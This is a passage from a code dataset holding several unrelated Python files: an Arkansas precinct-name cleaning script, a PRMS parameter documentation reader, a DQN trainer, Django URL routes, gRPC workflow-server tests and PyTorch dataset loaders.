})\n\ndef newton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Mt Sherman\": \"Mt. Sherman\"}\n )\n\n\ndef perry(dat):\n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"1 - Aplin\": \"1-aplin\",\n \"10 - Perry\": \"10-perry\",\n \"11 - Petit Jean\": \"11-petit jean\",\n \"12 - Rankin\": \"12-rankin\",\n \"13 - Rose Creek\": \"13-rose creek\",\n \"14 - Tyler\": \"14-tyler\",#\n \"15 - Union\": \"15-union\",\n \"16 - Union Valley\": \"16-union valley\",\n \"17 - Wye\": \"17-Wye\",\n \"2 - Casa\": \"2-Casa\",\n \"3 - Cherry Hill\": \"3-Cherry Hill\",\n \"4 - Fourche\": \"4-Fourche\",\n \"5 - Houston\": \"5-Houston\",\n \"6 - Kenney\": \"6-Kenney\",\n \"7 - Lake\": \"7-Lake\",\n \"8 - Maumelle\": \"8-Maumelle\",\n \"9 - New Tennessee\": \"9-New Tennessee\",\n })\n\n\ndef phillips(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bush\": \"PRECINCT 0001\",\n \"Cleburne I\": \"PRECINCT 0008\",\n \"Cleburne II\": \"PRECINCT 0008\",\n \"Cleveland\": \"PRECINCT 0014\",\n \"Cypress\": \"PRECINCT 0014\",\n \"Elaine I\": \"PRECINCT 0016\",\n \"Elaine II\": \"PRECINCT 0016\",\n \"Helena West Helena 1\": \"PRECINCT 0001\",\n \"Helena West Helena 2\": \"PRECINCT 0003\",\n \"Helena West Helena 3\": \"PRECINCT 0005/0006\",\n \"Hickory Ridge Marvell 1\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell I\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell II\": \"PRECINCT 0013\",\n \"Hickory Ridge Marvell III\": \"PRECINCT 0013\",\n \"Hicksville\": \"PRECINCT 0013\",\n \"Honor VII\": \"PRECINCT 0007\",\n \"Hornor\": \"PRECINCT 0007\",\n \"Hornor II\": \"PRECINCT 0007\",\n \"Hornor III\": \"PRECINCT 0007\",\n \"Hornor IV\": \"PRECINCT 0007\",\n \"Hornor V\": \"PRECINCT 0007\",\n \"Hornor VI\": \"PRECINCT 0007\",\n \"L-Anquille\": \"PRECINCT 0001\",\n \"Lake\": \"PRECINCT 0002\",\n \"Lakeview City\": \"PRECINCT 0015\",\n \"Lexa City\": \"PRECINCT 0010\",\n \"Lower Big Creek\": \"PRECINCT 0014\",\n \"Marion\": \"PRECINCT 0011\",\n \"Marion I\": \"PRECINCT 0011\",\n \"Mooney\": \"PRECINCT 0017\",\n \"Searcy I\": \"PRECINCT 0015\",\n \"Searcy II\": \"PRECINCT 0015\",\n \"Searcy III\": \"PRECINCT 0015\",\n \"Spring Creek I\": \"PRECINCT 0009\",\n \"Spring Creek II\": \"PRECINCT 0009\",\n \"Spring Creek III\": \"PRECINCT 0009\",\n \"Spring Creek IV\": \"PRECINCT 0010\",\n \"Spring Creek V\": \"PRECINCT 0009\",\n \"St Francis I\": \"PRECINCT 0001\",\n \"St Francis II\": \"PRECINCT 0001\",\n \"St Francis IV\": \"PRECINCT 0001\",\n \"Tappan I\": \"PRECINCT 0016\",\n \"Tappan II\": \"PRECINCT 0016\",\n \"Upper Big Creek\": \"PRECINCT 0012\",\n })\n\n\ndef polk(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"09 - DALLAS VALLEY/ SHADY\": \"09 - Dallas Valley\",\n \"01- MENA\": \"01 - Precinct 1\",\n \"02- MENA\": \"02 - Precinct 2\",\n \"03- MENA\": \"03 - Precinct 3\",\n })\n chop_five(dat)\n\n\ndef pope(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].str.replace(\"-\", \"\")\n\n\ndef prairie(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Belcher / Tyler\": \"Belcher/Tyler\",\n \"White River Ward 1\": \"White River City Ward 1\",\n \"White River Ward 2\": \"White River City Ward 2\",\n \"White River Ward 3\": \"White River City Ward 3\",\n })\n\n\ndef pulaski(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=9)\n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n\n\ndef randolph(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Elevenpoint\": \"Eleven point\",\n \"Okean\": \"O'kean\",\n \"Ward One\": \"Ward 1\",\n \"Ward 
Two\": \"Ward 2\",\n \"Ward Three\": \"Ward 3\",\n })\n\n\ndef saline(dat):\n dat[\"prec\"] = \"Precinct \" + dat[\"prec\"]\n\n\n\ndef scott(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Lewis 1\": \"Lewis Ward 1\",\n \"Lewis 2\": \"Lewis Ward 2\",\n \"Lewis 3\": \"Lewis Ward 3\",\n \"Mt. Pleasant\": \"Mount Pleasant\",\n })\n\n\ndef sebastian(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=9)\n\ndef sevier(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"De Queen Northwest\": \"DQ northwest\",\n })\n\ndef stone(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Angora Mtn\": \"Angora Mountain\",\n \"Dodd Mtn\": \"Dodd Mountain\"\n })\n\n\ndef union(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Country Box # 1\": \"Country Box #1\",\n \"Country Box # 2\": \"Country Box #2\",\n \"Country Box # 3\": \"Country Box #3\",\n \"Country Box # 4\": \"Country Box #4\",\n \"Country Box # 5\": \"Country Box #5\",\n \"Country Box # 6\": \"Country Box #6\",\n \"Country Box # 7\": \"Country Box #7\",\n \"Mt Holly\": \"mt. holly\",\n \"Ward 1\": \"ward #1\",\n \"Ward 2\": \"ward #2\",\n \"Ward 3\": \"ward #3\",\n \"Ward 4\": \"ward #4\",\n \"Woolleys Store\": \"WOOLEYS STORE\",\n })\n\n\ndef washington(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Prairie Gr City - House\": \"Prairie Gr City-House\",\n \"Prairie Gr City - Senate\": \"Prairie Gr City-Senate\",\n \"Richland - Senate\": \"Richland-Senate\",\n \"Fay 01\": \"Fay 1\",\n \"Fay 02\": \"Fay 2\",\n \"Fay 03\": \"Fay 3\",\n \"Fay 04\": \"Fay 4\",\n \"Fay 05\": \"Fay 5\",\n \"Fay 06\": \"Fay 6\",\n \"Fay 07\": \"Fay 7\",\n \"Fay 08\": \"Fay 8\",\n \"Spg 01\": \"Spg 1\",\n \"Spg 02\": \"Spg 2\",\n \"Spg 03\": \"Spg 3\",\n \"Spg 04\": \"Spg 4\",\n \"Spg 05\": \"Spg 5\",\n \"Spg 06\": \"Spg 6\",\n \"Spg 07\": \"Spg 7\",\n \"Spg 08\": \"Spg 8\",\n \"Spg 09\": \"Spg 9\",\n })\n\ndef woodruff(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Augusta - 01\": \"Augusta Armory -01\",\n \"Augusta - 02\": \"Augusta Armory-02\",\n \"Augusta - 03\": \"Augusta Hsng Authority-03\",\n \"Cotton Plant - 08\": \"Babbs/Cotton Plant-08\",\n \"Cotton Plant - 09\": \"Babbs/Cotton Plant-09\",\n \"Cotton Plant/ Freeman - 07\": \"Babbs Cottn PL/Freeman-07\",\n \"Fakes Chapel - 20\": \"Fairgrounds Fakes Chpl-20\",\n \"Gregory - 06\": \"Gregory-06\",\n \"Hilleman - 13\": \"White Hall Church-13\",\n \"Howell - 12\": \"Fairgrounds/Howell-12\",\n \"Hunter - 11\": \"Hunter Methodist-11\",\n \"McCrory - 17\": \"McCrory Civic Center-17\",\n \"McCrory - 18\": \"McCrory Civic-18\",\n \"McCrory Rural - 15\": \"Frgrnds/McCrory Rural-15\",\n \"Morton - 14\": \"Morton Baptist-14\",\n \"North Rural Augusta - 04\": \"Augusta Armory-04\",\n \"Patterson - 16\": \"Patterson Fire Station-16\",\n \"Pumkin Bend - 19\": \"Pumpkin Bend Church-19\",\n \"Rural Hunter - 10\": \"Hunter Methodist/Rural-10\",\n \"South Rural Augusta - 05\": \"Augusta Armory-05\",\n })\n\n\"\"\"\noverall call function\n\"\"\"\ncountyToCountyCleaner = {\n \"Arkansas\": arkansas,\n \"Ashley\": ashley,\n \"Baxter\": baxter,\n \"Benton\": benton,\n \"Boone\": boone,\n \"Bradley\": bradley,\n \"Carroll\": carroll,\n \"Chicot\": chicot,\n \"Clark\": clark,\n \"Clay\": clay,\n \"Cleburne\": chop_five,\n \"Cleveland\": cleveland,\n \"Columbia\": columbia,\n \"Conway\": conway,\n \"Crawford\": crawford,\n \"Cross\": cross,\n \"Dallas\": dallas,\n \"Desha\": desha,\n \"Drew\": drew,\n \"Faulkner\": faulkner,\n \"Franklin\": franklin,\n \"Fulton\": fulton,\n 
\"Garland\": garland,\n \"Grant\": chop_five,\n \"Greene\": greene,\n \"Hempstead\": hempstead,\n \"Hot Spring\": hotspring,\n \"Howard\": howard,\n \"Independence\": independence,\n \"Izard\": izard,\n \"Jackson\": jackson,\n \"Lafayette\": lafayette,\n \"Lawrence\": lawrence,\n \"Lee\": lee,\n \"Lincoln\": lincoln,\n \"Little River\": littleriver,\n \"Logan\": logan,\n \"Lonoke\": lonoke,\n \"Marion\": marion,\n \"Miller\": miller,\n \"Monroe\": monroe,\n \"Montgomery\": montgomery,\n \"Newton\": newton,\n \"Perry\": perry,\n \"Phillips\": phillips,\n \"Pike\": chop_five,\n \"Polk\": polk,\n \"Pope\": pope,\n \"Prairie\": prairie,\n \"Pulaski\": pulaski,\n \"Randolph\": randolph,\n \"Saline\": saline,\n \"Sebastian\": sebastian,\n \"Sevier\": sevier,\n \"Scott\": scott,\n \"Stone\": stone,\n \"Union\": union,\n \"Washington\": washington,\n \"Woodruff\": woodruff,\n \"Yell\": chop_five,\n}\n\n# to test for select counties\n# raw_df = shp_df.loc[\n# (shp_df['county_nam'] == \"Desha\") |\n# (shp_df['county_nam'] == \"Benton\") |\n# (shp_df['county_nam'] == \"Woodruff\")]\n\n# must sort alphabetically in order for second-order function to work\nclean_df = shp_df.sort_values(by=['county_nam'])\n\ncounties = pd.Series(clean_df['county_nam']).unique()\nclean_df[\"prec\"] = clean_df[\"precinct\"].copy()\nclean_df.set_index(['county_nam', 'precinct'], inplace=True)\nprint(\"duplicated indices\", clean_df[clean_df.index.duplicated()])\n\n\nfor county in counties:\n county_dat = clean_df.loc[county]\n changed = countyToCountyCleaner.get(county, lambda x: x)(county_dat)\n clean_df.update(county_dat)\n\nclean_df['prec_edit'] = clean_df['prec'].str.lower()\nclean_df.reset_index(inplace=True)\n\nclean_df.to_file(\"/Users/hopecj/projects/AR/Shapefiles/1_edited_precnames/clean.shp\")\n","sub_path":"AR/edit_prec_names.py","file_name":"edit_prec_names.py","file_ext":"py","file_size_in_byte":29525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277279719","text":"import os\n\n\nclass Helper(object):\n \"\"\"\n Basic Help class for PRMS parameter variables\n\n The function has two goals, 1) to allow the user to get help on a parameter\n or a variable and 2) allow pyGSFLOW to run error checkers on parameters\n values and sizes\n\n \"\"\"\n\n def __init__(self):\n self.__prms_parameter_names = None\n self.__prms_dimension_names = None\n self.__prms_output_variables = None\n self._read_param_doc()\n self._read_var_doc()\n\n @property\n def prms_parameter_names(self):\n \"\"\"\n Returns a dictionary of prms parameter names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_parameter_names\n\n @property\n def prms_dimension_names(self):\n \"\"\"\n Returns a dictionary of prms dimension names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_dimension_names\n\n @property\n def prms_output_variables(self):\n \"\"\"\n Returns a dictionary of prms output variable names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_output_variables\n\n def _read_param_doc(self):\n \"\"\"\n Reads the PRMS parameter documentation\n \"\"\"\n\n fn = os.path.join(\n os.path.dirname(__file__), r\"gsflow_prms.control.par_name\"\n )\n with open(fn, \"r\") as fid:\n # content = fid.readlines()\n # fid.close()\n is_dim_section = False\n is_par_section = False\n # content = iter(content)\n dimensions = {}\n parameters = {}\n while True:\n try:\n line = 
fid.readline()\n if \"Bounded\" in line:\n curr_par = dimensions[name.strip()]\n key, value = line.split(\":\")\n curr_par[key] = value\n dimensions[name.strip()] = curr_par\n continue\n except:\n # End of file\n break\n\n if (\n line.strip()\n == \"--------------- DIMENSIONS ---------------\"\n ):\n is_dim_section = True\n is_par_section = False\n continue\n\n if (\n line.strip()\n == \"--------------- PARAMETERS ---------------\"\n ):\n is_par_section = True\n is_dim_section = False\n continue\n\n if not is_dim_section and not is_par_section:\n continue\n\n if is_dim_section:\n if line.strip() == \"\":\n # read three lines\n line = fid.readline()\n key, name = line.split(\":\") # dim name\n\n line = fid.readline()\n key, value = line.split(\":\") # dim value\n\n line = fid.readline()\n key, desc = line.split(\":\") # dim Desc\n\n dimensions[name.strip()] = {\n \"Value\": int(value.strip()),\n \"Desc\": desc.strip(),\n }\n\n if is_par_section:\n if line.strip() == \"\":\n # read three lines\n line = fid.readline()\n key, name = line.split(\":\") # dim name\n curr_par = {}\n for i in range(12):\n line = fid.readline()\n try:\n key, value = line.split(\":\") # dim value\n except:\n pass\n value = value.strip()\n if key.strip() in [\"Ndimen\", \"Size\", \"Width\"]:\n value = int(value)\n if key.strip() == \"Dimensions\":\n values = value.split(\",\")\n value = []\n for v in values:\n dimname, val = v.split(\"-\")\n value.append((dimname, int(val)))\n\n if key.strip() in [\"Max\", \"Min\", \"Default\"]:\n if curr_par[\"Type\"] == \"float\":\n value = float(value)\n elif curr_par[\"Type\"] == \"long\":\n value = int(value)\n else:\n pass # unknow type\n\n curr_par[key.strip()] = value\n\n parameters[name.strip()] = curr_par\n\n self.__prms_parameter_names = parameters\n self.__prms_dimension_names = dimensions\n\n def _read_var_doc(self):\n \"\"\"\n Reads the PRMS output variables documentation\n \"\"\"\n fn = os.path.join(\n os.path.dirname(__file__), r\"gsflow_prms.control.var_name\"\n )\n fid = open(fn, \"r\")\n content = fid.read()\n fid.close()\n content = content.split(\"****\")[1]\n content = content[2:]\n content = content.split(\"\\n\\n\")\n All_variables = dict()\n for line in content:\n recs = line.split(\"\\n\")\n curr_record = dict()\n for rec in recs:\n vv = rec.strip().split(\":\")\n name = vv[0]\n value = \" \".join(vv[1:])\n if name in [\"Ndimen\", \"Size\"]:\n value = int(value)\n\n if name in [\"Dimensions\"]:\n if curr_record[\"Ndimen\"] > 1:\n values = value.split(\",\")\n value = []\n for val in values:\n val = val.split(\"-\")\n val[1] = int(val[1])\n value.append(val)\n else:\n value = value.split(\"-\")\n value[1] = int(value[1])\n\n if name == \"Name\":\n Field_name = value\n else:\n curr_record[name] = value\n All_variables[Field_name] = curr_record\n\n self.__prms_output_variables = All_variables\n","sub_path":"gsflow/prms/prms_help.py","file_name":"prms_help.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"257869518","text":"from agent import DQN\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nfrom csvSaver import Saver\nfrom hyperparams import HyperParameters\n\n\nclass Trainer:\n def __init__(self, env, state_shape, action_size, params):\n self.state_shape = state_shape\n self.action_size = action_size\n self.params = params\n self.env = env\n self.agent = DQN(state_shape, action_size, self.params)\n\n def preprocess(self, img: np.array):\n img = 
img.astype(np.float32)\n img += np.random.normal(0.0, 0.15, self.state_shape).astype(np.float32)\n img = np.clip(img, 0, 255)\n img = np.expand_dims(img, axis=0)\n return img\n\n def close(self):\n self.env.close()\n\n def run(self, max_epochs, save_interval, save_path, test_nr, verbosity=True):\n saver = Saver(save_path, test_nr, 'test.h5', save_interval, max_epochs, self.params)\n\n times = 0\n scores = 0\n\n for episode in range(max_epochs):\n total_reward = 0\n\n state = self.env.reset()\n state = self.preprocess(state)\n\n for time in range(5000):\n action = self.agent.act(state)\n\n next_state, reward, done, _ = self.env.step(action)\n\n total_reward += reward\n\n next_state = self.preprocess(next_state)\n self.agent.remember(state, action, reward, next_state, done)\n state = next_state\n\n self.agent.replay()\n\n if done:\n scores += total_reward\n times += time\n break\n\n if episode % save_interval == 0:\n score_avg = scores / save_interval\n time_avg = times / save_interval\n scores, times = 0, 0\n saver.write_to_file(episode, time_avg, score_avg, self.agent.epsilon, self.agent.memory.size())\n if verbosity:\n print(\"episode: {}/{}, time: {}, average scores: {}, e: {:.2}, memory: {} \" \\\n .format(episode, max_epochs, time_avg, score_avg, self.agent.epsilon, self.agent.memory.size()))\n","sub_path":"Trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630726596","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'online'\nurlpatterns = [\n url(r'^$', views.login, name='login'),\n url(r'^login/$', views.login, name='login'),\n url(r'^regist/$', views.regist, name='regist'),\n url(r'^index/$', views.index, name='index'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^verify/(\\d+)/(\\d+)/$', views.verify, name='verify'),\n url(r'^check/$', views.check, name='check'),\n url(r'^temp/$', views.temp)\n]\n","sub_path":"online/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"4356010","text":"import unittest\nimport time\nfrom blowpipe import client_grpc\nfrom tests.test_constants import *\nfrom tests import test_bp_utils\nfrom blowpipe.logger import Logger\n\n\nclass GRPCClientServerTests(unittest.TestCase):\n \"\"\"\n The purpose of these tests is to assert blind that the client\n can talk to a server (I don't run the server here, it is run\n externally. This allows me to check e.g. 
a go implementation\n\n The cheat here is I actually do run the server, but I don't do ANY\n checking of it, or the DB.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n self.server = test_bp_utils.create_blowpipe_server(root_dir=test_bp_utils.DEFAULT_BLOWPIPE_HOME, low_port=9000, high_port=11000)\n self.server.start(blocking=False)\n self.logger = Logger(\"GRPCClientServerTests\")\n time.sleep(2.5)\n\n @classmethod\n def tearDownClass(self):\n self.server.stop()\n time.sleep(2.5)\n\n def setUp(self):\n self.server.db.reset()\n\n def create_client(self):\n client = client_grpc.GRPCClient()\n client.config.set_grpc_port(self.server.config.get_grpc_port())\n client.connect()\n return client\n\n def test_AddWorkflow(self):\n client = self.create_client()\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n self.assertEqual(len(client.ListWorkflows()), 0)\n response = client.AddWorkflow(workflow)\n workflow_id = response.id\n self.assertTrue(response.success)\n self.logger.debug(workflow_id)\n self.assertEqual(len(client.ListWorkflows()), 1)\n return workflow_id\n\n def test_DeleteWorkflow(self):\n client = self.create_client()\n workflow_id = self.test_AddWorkflow()\n self.assertEqual(len(client.ListWorkflows()), 1)\n response = client.DeleteWorkflow(workflow_id)\n self.assertTrue(response.success)\n self.assertEqual(len(client.ListWorkflows()), 0)\n\n def test_ListWorkflows(self):\n client = self.create_client()\n workflows = client.ListWorkflows()\n self.assertEqual(len(workflows), 0)\n\n def test_GetWorkflow(self):\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n workflow_local = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow_local)\n workflow_remote = client.GetWorkflow(response.id)\n self.assertIsNotNone(workflow_remote)\n\n def test_UpdateWorkflow(self):\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n workflow_local = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow_local)\n workflow_remote = client.GetWorkflow(response.id)\n self.assertEqual(workflow_local.get_name(), workflow_remote.get_name())\n\n workflow_id = response.id\n workflow_remote.set_name(\"Foo\")\n reason = \"Setting foo.\"\n update_response = client.UpdateWorkflow(workflow_id, workflow_remote, reason)\n self.assertTrue(update_response.success)\n\n updated_workflow = client.GetWorkflow(workflow_id)\n self.assertEqual(\"Foo\", updated_workflow.get_name())\n\n def test_Status(self):\n client = self.create_client()\n response = client.Status()\n self.logger.debug(response)\n\n def test_WorkflowDefinitionHistory(self):\n # setup\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n self.assertEqual(0, len(client.ListWorkflowHistory(\"id\")))\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n # create and assert history is size 1\n response = client.AddWorkflow(workflow)\n workflow_id = response.id\n self.assertEqual(1, len(client.ListWorkflowHistory(workflow_id)))\n\n # update it - check history is size 2\n workflow.set_name(\"changed 1\")\n client.UpdateWorkflow(workflow_id, workflow, \"changed 1\")\n self.assertEqual(2, len(client.ListWorkflowHistory(workflow_id)))\n\n workflow.set_name(\"changed 2\")\n client.UpdateWorkflow(workflow_id, workflow, \"changed 2\")\n self.assertEqual(3, len(client.ListWorkflowHistory(workflow_id)))\n\n client.DeleteWorkflow(workflow_id)\n 
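# the delete itself is recorded, so the audit trail now holds four\n # entries: the add, two updates, and the delete\n 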
self.assertEqual(4, len(client.ListWorkflowHistory(workflow_id)))\n\n def test_GetAllConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n response = client.SetConfig(\"key2\", \"value2\")\n response = client.SetConfig(\"key3\", \"value3\")\n response = client.SetConfig(\"key\", \"value_x\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(3, len(all_after))\n response2 = client.GetConfig(\"Foo\")\n self.assertFalse(response2.success)\n response3 = client.GetConfig(\"key3\")\n self.assertEqual(\"value3\", response3.value)\n\n response4 = client.GetConfig(\"key\")\n self.assertEqual(\"value_x\", response4.value)\n self.assertEqual(\"key\", response4.key)\n self.assertTrue(response4.success)\n\n def test_GetConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n response2 = client.GetConfig(\"Foo\")\n self.assertFalse(response2.success)\n\n def test_SetConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n\n def test_DeleteConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n response2 = client.DeleteConfig(\"key\")\n all_after2 = client.GetAllConfig()\n self.assertTrue(response2.success)\n self.assertEqual(0, len(all_after2))\n\n def test_ManualTrigger_MissingWorkflow(self):\n client = self.create_client()\n workflow_id = \"I do not exist.\"\n response = client.ManualTrigger(workflow_id)\n self.assertFalse(response.success)\n\n \"\"\"\n def test_GetLog(self):\n self.fail(\"Not implemented.\")\n\n def test_SetWorkflowState(self):\n self.fail(\"Not implemented.\")\n \"\"\"\n\n def test_ManualTrigger(self):\n client = self.create_client()\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow)\n self.assertTrue(response.success)\n workflow_id = response.id\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(0, len(query_response))\n\n response = client.ManualTrigger(workflow_id)\n self.assertTrue(response.success)\n self.assertEqual(workflow_id, response.workflow_id)\n self.assertIsNotNone(response.run_id)\n self.assertNotEqual(response.run_id.strip(), \"\")\n self.logger.debug(\"test_ManualTrigger, run_id=\" + response.run_id)\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(1, len(query_response))\n\n self.logger.debug(\"Waiting for the job to complete.\")\n time.sleep(9)\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(0, len(query_response))\n\n # so it should have started\n\n\n","sub_path":"code/python/tests/test_client_grpc.py","file_name":"test_client_grpc.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153606921","text":"import 
os\nimport pdb\nimport time\nimport h5py\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom PIL import Image\nfrom acarpog.util import *\nimport torch.utils.data as data\nfrom acarpog.diagnostics import *\nfrom torchvision import transforms\nimport torchvision.datasets.folder as fl\n#-------------------------------------------------------------------------\n# Functions\n#-------------------------------------------------------------------------\ndef imagenet_transform(scale=224):\n dt_trns = {\n 'train': transforms.Compose([\n transforms.Resize((scale,scale)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'test': transforms.Compose([\n transforms.Resize((scale,scale)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n }\n return dt_trns\n#-------------------------------------------------------------------------\ndef txt_sloss(txt_route):\n obj = open(txt_route,'r')\n lins = obj.readlines(); i_rs = []; l_im = []\n obj.close()\n cls_l = lins[0]\n clss = cls_l.strip().split(',')\n for ligne in lins[1::]:\n [r_t, lb] = ligne.split(',')\n i_rs.append(r_t)\n l_c = lb.strip()\n l_im.append(l_c)\n return i_rs,l_im,clss\n#-------------------------------------------------------------------------\ndef txt_mloss(txt_route,losses=2):\n obj = open(txt_route,'r')\n lins = obj.readlines(); i_rs = []; l_im = []\n obj.close()\n clss = []\n for x in range(losses):\n clss.append(lins[x].strip().split(','))\n for ligne in lins[losses::]:\n [r_t, lb] = ligne.split(',')\n i_rs.append(r_t)\n l_c = lb.strip()\n l_im.append(l_c)\n return i_rs,l_im,clss\n\n#-------------------------------------------------------------------------\n# Classes\n#-------------------------------------------------------------------------\nclass HDF5Dataset(data.Dataset):\n \"\"\"\n Class HDF5Dataset\n Class implemented to be able to load .h5 dataset files onto pytorch,\n requires the route for the h5.py datset.\n\n \"\"\"\n def __init__(self, data_files):\n lct = os.listdir(data_files)\n lct = filt_dir(lct,'.h5');\n self.data_files = sorted(lct)\n self.dir_dt = data_files;\n def __getitem__(self, index):\n return _load_hdf5_file(os.path.join(self.dir_dt,\n self.data_files[index]))\n def __len__(self):\n return len(self.data_files)\n#-------------------------------------------------------------------------\nclass Singlab_dataset(data.Dataset):\n \"\"\" \n Class Singlab_dataset\n Class implemented to generate a dataset for single category image \n classification\n \n \"\"\"\n def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n txt_fun = txt_sloss):\n [iroutes,ilabs,iclass] = txt_fun(txt_r)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader = loader\n self.transform = transform\n self.classes = iclass\n def __getitem__(self,index):\n img = self.loader(self.impath[index])\n if self.transform is not None:\n img = self.transform(img)\n kek = self.imlabs[index].strip()\n labels = int(kek)\n return img,labels\n def __len__(self):\n return len(self.imlabs)\t\n#-------------------------------------------------------------------------\nclass Multilab_dataset(data.Dataset):\n \"\"\" \n Class Multilab_dataset\n Class implemented to generate a dataset for multiple category image \n classification\n \n \"\"\"\n def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n txt_fun = txt_sloss):\n [iroutes,ilabs,iclass] = txt_fun(txt_r)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader 
        [iroutes,ilabs,iclass] = txt_fun(txt_r)\n        self.impath = iroutes\n        self.imlabs = ilabs\n        self.loader = loader\n        self.transform = transform\n        self.classes = iclass\n    def __getitem__(self,index):\n        img = self.loader(self.impath[index])\n        if self.transform is not None:\n            img = self.transform(img)\n        l_str = self.imlabs[index]\n        l_arr = np.asarray(l_str.split())\n        # list() is needed on Python 3, where map() returns an iterator\n        kek = np.asarray(list(map(int,l_arr)))\n        labels = torch.from_numpy(kek)\n        return img,labels\n    def __len__(self):\n        return len(self.imlabs)\n#-------------------------------------------------------------------------\nclass Softbin_dataset(data.Dataset):\n    \"\"\" \n    Class Softbin_dataset\n    Class implemented to generate a dataset to perform softbinning for \n    image regression. \n    \n    \"\"\"\n    def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n                 txt_fun = txt_sloss):\n        [iroutes,ilabs,iclass] = txt_fun(txt_r)\n        self.impath = iroutes\n        self.imlabs = ilabs\n        self.loader = loader\n        self.transform = transform\n        self.classes = iclass\n    def __getitem__(self,index):\n        img = self.loader(self.impath[index])\n        if self.transform is not None:\n            img = self.transform(img)\n        l_str = self.imlabs[index]\n        l_arr = np.asarray(l_str.split())\n        kek = np.asarray(list(map(float,l_arr)))\n        labels = torch.from_numpy(kek)\n        return img,labels\n    def __len__(self):\n        return len(self.imlabs)\n\n#-------------------------------------------------------------------------\nclass Multiloss_dataset(data.Dataset):\n    \"\"\"\n    Class Multiloss_dataset\n    Class implemented to generate a dataset for multiple classification\n    tasks on a single run\n\n    \"\"\"\n    def __init__(self,txt_r,transform = None,losses=2,\n                 loader = fl.default_loader):\n        [iroutes,ilabs,iclass] = txt_mloss(txt_r,losses)\n        self.impath = iroutes\n        self.imlabs = ilabs\n        self.loader = loader\n        self.transform = transform\n        self.classes = iclass\n    def __getitem__(self,index):\n        img = self.loader(self.impath[index])\n        if self.transform is not None:\n            img = self.transform(img)\n        l_str = self.imlabs[index]\n        l_arr = np.asarray(l_str.split())\n        kek = np.asarray(list(map(int,l_arr)))\n        labels = 